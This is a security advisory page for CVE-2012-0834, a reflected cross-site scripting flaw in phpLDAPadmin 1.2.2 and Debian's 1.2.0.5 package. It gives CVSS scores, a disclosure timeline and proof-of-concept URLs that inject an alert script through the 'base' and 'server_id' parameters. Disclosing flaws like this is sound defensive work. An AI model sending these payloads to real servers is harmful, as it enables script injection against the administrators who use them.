phpldapadmin 1.2.2 Cross Site Scripting

2012-02-02 / 2012-08-15
Credit: None
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2012-0834
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Attach some PoC analysis related to a XSS vulnerability to phpldapadmin. I previously coordinate with the Cert-US in order they contact with Sourceforge and Debian, but receive they was unable to put in contact with them. The first discover was on January 10 for 1.1.6 version, where after noticed that the same vulnerability was discover previously. For that reason I tested later for version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package). More reference: see the files attached On January 24 I contacted to sourceforge and appear they fix the package but still persistence on debian packages. Fix from sourceforge: https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546 Background: =========== phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multilanguage administration for your LDAP server. Its hierarchical tree-viewer and advanced search functionality make it intuitive to browse and administer your LDAP directory. Since it is a web application, this LDAP browser works on many platforms, making your LDAP server easily manageable from any location. Details: ======== 1.- Version 1.2.2 from Sourceforge package:http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download Exploitables URI's: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search PoC: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search Exploitable variable: base Results: XSS passing through "base" variable. 2.- Version 1.2.0.5 from debian (testing and unstable repositories) Package: Version: 1.2.0.5-2 Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | php5-cgi | php5, ucf (>= 0.28), debconf (>= 0.5) | debconf-2.0 Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb Size: 1276080 MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7 SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57 PoC: https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script> https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false Exploitable Variable: server_id Results: XSS passing through "server_id" variable. Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks by various vectors. Thanks in advance for your comments Kind Regards


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top